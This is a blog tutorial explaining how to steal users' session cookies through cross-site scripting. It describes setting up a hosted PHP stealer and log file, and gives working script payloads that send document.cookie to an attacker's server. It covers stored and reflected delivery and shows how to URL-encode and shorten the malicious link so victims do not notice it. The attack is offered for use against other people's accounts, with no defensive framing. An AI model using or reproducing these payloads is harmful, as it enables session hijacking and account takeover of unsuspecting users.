Cookie Stealing From Cross Site Scripting ( xss ) Attack

Cookie Stealing From Cross Site Scripting ( xss ) Attack

Cookie Stealing From Cross Site Scripting (xss ) Attack

Hello Guys, In this post I will show you Cookie Stealing From Cross Site Scripting ( xss ) Attack. How Attacker can steal cookie from users ?. So I hope you are familiar with xss If not then please read our basic xss tutorial.

Pre-requisite :

  • A Cookie Stealer Code : Get It From Here
  • A Free Web Hosting.
  • Basic Knowledge About XSS Attack.

Cookie stealing is the process in which and attacker exploit the xss vulnerability and steal the cookie from the victim who visit the infected link. These cookie will be used to compromise their accounts.

Creating PHP Cookie Stealer

 

  • Copy the cookie stealer code from here.
  • Open the notepad or any editor and paste the code.
  • Save the file with .php extension. Ex:- xss.php

Now create New file and save it as log.txt (leave it as blank). Don’t change the name , this is the file name what we give in php file.
Now we have Two Files : 1) xss.php 
                                      2) log.txt

Hosting Cookie Stealer and Log file

Now we have to host both the files for hosting files you can use free web hosting or you can do secure tunelling. After hosting domain the stealer will be at : www.domain.com/xss.php

Cookie Stealing From Cross Site Scripting ( xss ) Attack

Now, we have set everything now we have to find vulnerable website to exploit to inject our malicious code.

<script>location.href = ‘http://www.site.com/xss.php?cookie=’+document.cookie;</script>

Cookie Stealing with Stored vs Reflected XSS:

Stored: if you inject this code in Persistent XSS vulnerable site, it will be there forever until admin find it.  It will be shown to all users.  So attackers don’t need to send any link to others.  Whoever visit the page, they will be vicim.

Reflected: In case of Non-persistent attack, attacker will send the link to victims. Whenever they follow the link, it will steal the cookie.  Most of sites are vulnerable to Reflected XSS .

In Reflected, Attackers will send the injected link victims.
For example:
hxxp://www.VulnerableSite.com/index.php?search=<script>location.href = ‘http://www.Yoursite.com/Stealer.php?cookie=’+document.cookie;</script>

The above link is clearly shows the script. Attacker can encode this script in url encoding and and make short the link with url shortening service like tiny url and then send to victim.

http://www.Site.com/index.php?search=%3c%73%63%72%69%70%74%3e%6c%6f%63%61%74%69%6f%6e%2e%68%72%65%66%20%3d%20%27%68%74%74%70%3a%2f%2f%77%77%77%2e%59%6f%75%72%73%69%74%65%2e%63%6f%6d%2f%53%74%65%61%6c%65%72%2e%70%68%70%3f%63%6f%6f%6b%69%65%3d%27%2b%64%6f%63%75%6d%65%6e%74%2e%63%6f%6f%6b%69%65%3b%3c%2f%73%63%72%69%70%74%3e

Once the victim Open the link, his/her cookie will be stored in log.txt file.

 

Author: Ahmed Raza Memon

I am 17 years old Ethical Hacker, Penetration Tester, Web Security Expert and Exploit Writer From the India. My area of expertise includes Ethical Hacking, Vulnerability Assessment, Information Security Audits, Penetration Testing, Exploit Writing, Web Application security, Source Code Reviews, Forensic Investigation and Cyber Law. I have been Acknowledged by many top companies like Microsoft, Apple, SAP, AOL, Sony and many More...

Leave a Reply